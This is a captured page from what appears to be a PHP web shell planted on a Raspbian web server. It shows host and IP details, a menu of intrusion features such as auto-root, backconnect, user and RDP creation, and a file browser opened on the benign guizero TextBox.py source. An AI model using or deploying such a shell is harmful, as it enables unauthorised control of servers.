Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
guizero /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
App.py
1.99
KB
-rw-r--r--
Box.py
3.11
KB
-rw-r--r--
ButtonGroup.py
10.2
KB
-rw-r--r--
CheckBox.py
4.63
KB
-rw-r--r--
Combo.py
10.54
KB
-rw-r--r--
ListBox.py
8.05
KB
-rw-r--r--
MenuBar.py
1.32
KB
-rw-r--r--
Picture.py
2.58
KB
-rw-r--r--
PushButton.py
5.2
KB
-rw-r--r--
RadioButton.py
1.7
KB
-rw-r--r--
Slider.py
2.59
KB
-rw-r--r--
Text.py
2.71
KB
-rw-r--r--
TextBox.py
3.7
KB
-rw-r--r--
Waffle.py
10.4
KB
-rw-r--r--
Window.py
1.03
KB
-rw-r--r--
__init__.py
715
B
-rw-r--r--
alerts.py
1.17
KB
-rw-r--r--
base.py
18.22
KB
-rw-r--r--
event.py
5.87
KB
-rw-r--r--
tkmixins.py
10.47
KB
-rw-r--r--
utilities.py
11.77
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TextBox.py
from tkinter import Entry, StringVar, Text, END from tkinter.scrolledtext import ScrolledText from . import utilities as utils from .base import TextWidget class TextBox(TextWidget): def __init__( self, master, text="", width=10, height=1, grid=None, align=None, visible=True, enabled=None, multiline=False, scrollbar=False, command=None): description = "[TextBox] object with text \"" + str(text) + "\"" self._multiline = multiline # Set up controlling string variable self._text = StringVar() self._text.set( str(text) ) # Create a tk object for the text box if multiline: if scrollbar: #tk = ScrolledText(master.tk, width=width, height=height, wrap="word") tk = ScrolledText(master.tk, wrap="word") else: #tk = Text(master.tk, width=width, height=height) tk = Text(master.tk) tk.insert(END,self._text.get()) else: #tk = Entry(master.tk, textvariable=self._text, width=width) tk = Entry(master.tk, textvariable=self._text) super(TextBox, self).__init__(master, tk, description, grid, align, visible, enabled, width, height) self.update_command(command) # Bind the key pressed event self.events.set_event("<TextBox.KeyPress>", "<KeyPress>", self._key_pressed) # PROPERTIES # ---------------------------------- # The text value @property def value(self): if self._multiline: return self.tk.get(1.0,END) else: return self._text.get() @value.setter def value(self, value): self._text.set( str(value) ) if self._multiline: self.tk.delete(1.0,END) self.tk.insert(END,self._text.get()) self.description = "[TextBox] object with text \"" + str(value) + "\"" def resize(self, width, height): self._width = width if width != "fill": self._set_tk_config("width", width) if height is not None: if self._multiline: self._height = height if height != "fill": self.tk.config(height=height) else: if isinstance(height, int): if height > 1: utils.error_format("Cannot change the height of a single line TextBox{}".format(self.description)) # METHODS # ------------------------------------------- def _key_pressed(self, event): if self._command: args_expected = utils.no_args_expected(self._command) if args_expected == 0: self._command() elif args_expected == 1: self._command(event.key) else: utils.error_format("TextBox command function must accept either 0 or 1 arguments.\nThe current command has {} arguments.".format(args_expected)) def update_command(self, command): if command is None: self._command = lambda: None else: self._command = command # Clear text box def clear(self): self.value = "" # Append text def append(self, text): self.value = self.value + str(text) # DEPRECATED METHODS # -------------------------------------------- # Returns the text def get(self): return self.value utils.deprecated("TextBox get() is deprecated. Please use the value property instead.") # Sets the text def set(self, text): self.value = text utils.deprecated("TextBox set() is deprecated. Please use the value property instead.")
Close